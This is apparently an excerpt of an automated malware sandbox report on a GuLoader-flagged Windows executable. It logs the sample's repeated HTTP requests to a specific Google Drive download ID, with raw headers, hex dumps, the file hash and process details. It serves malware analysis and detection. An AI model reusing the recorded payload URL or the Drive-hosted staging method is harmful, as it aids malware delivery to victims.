                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749954142.250.181.1294437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:04 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:05 UTC1854INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:04 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-7gsQP8-NCGjTzkraN1Fevg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              X-GUploader-UploadID: AFiumC73NTmC9H6Y5FUq3dz1_NDNcaB0jNnPHXgrHByxyGcVGqR1S8_nrFjnJ4TceUsoIBj7Ik7zNPPI-w
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2024-12-03 16:34:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 57 49 59 4b 66 45 2d 42 53 62 57 49 79 43 6e 52 64 42 4a 43 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CWIYKfE-BSbWIyCnRdBJCg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.749976172.217.19.1744437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:17 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:18 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:17 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-gliYqRSfaIdU9CHwuR5DvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.749977142.250.181.1294437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:20 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:21 UTC1854INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:20 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-JIReUVT0q0e8uDKOVAttmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              X-GUploader-UploadID: AFiumC69ySAe0KNWO5rkaOD054Bi1kHVVrcl2veSN3iLFrkDBa9N_JZbAGPX0N9tWsIacJWi-PtCrCyHWQ
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2024-12-03 16:34:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 38 78 2d 61 4f 47 64 48 46 69 79 36 53 71 6f 4d 79 79 76 48 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="28x-aOGdHFiy6SqoMyyvHQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.749978172.217.19.1744437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:32 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:33 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:33 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-TJUuHEmtu34uX6NzLCtdaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.749979142.250.181.1294437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:35 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:36 UTC1854INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:36 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-qLiKVNPqKLZkGUXVrJvXtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              X-GUploader-UploadID: AFiumC6qAxvnDoPQ7jfn8D4kRK_EwyqLJiVgceit5Z3DkHqqkrMARPVc0BzfRS7wZNkh3X44P_09CYfBUw
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2024-12-03 16:34:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 49 6a 30 6a 63 67 6f 76 56 65 6d 36 4c 33 4e 4f 57 6f 78 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OIj0jcgovVem6L3NOWox4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.749980172.217.19.1744437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:48 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:49 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:48 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-kHdVhPYnsK81iM_t4yoZyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.749981142.250.181.1294437768C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-03 16:34:51 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
                                                              2024-12-03 16:34:52 UTC1854INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Tue, 03 Dec 2024 16:34:51 GMT
                                                              Content-Security-Policy: script-src 'nonce-rSmFBeBLZOq4ow2P9yKQfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              X-GUploader-UploadID: AFiumC7ItwFfCTE56UG9Y_N8FctEVXYz1-bBUDNn7YEB9dyoK0M04987q3rWg7-Uel6pFrMWFs24XvSHpg
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2024-12-03 16:34:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 4b 65 64 31 63 33 45 32 58 4e 74 46 70 56 39 46 69 69 44 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JKed1c3E2XNtFpV9FiiDHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Target ID:5
                                                              Start time:11:31:53
                                                              Start date:03/12/2024
                                                              Path:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\eAvqHiIsgR.exe"
                                                              Imagebase:0x400000
                                                              File size:882'600 bytes
                                                              MD5 hash:61518CFDED3109FAC04EE916AB275C26
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2943208218.0000000003404000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:12:53:43
                                                              Start date:03/12/2024
                                                              Path:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\eAvqHiIsgR.exe"
                                                              Imagebase:0x400000
                                                              File size:882'600 bytes
                                                              MD5 hash:61518CFDED3109FAC04EE916AB275C26
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.3129745415.00000000021F4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:19.1%
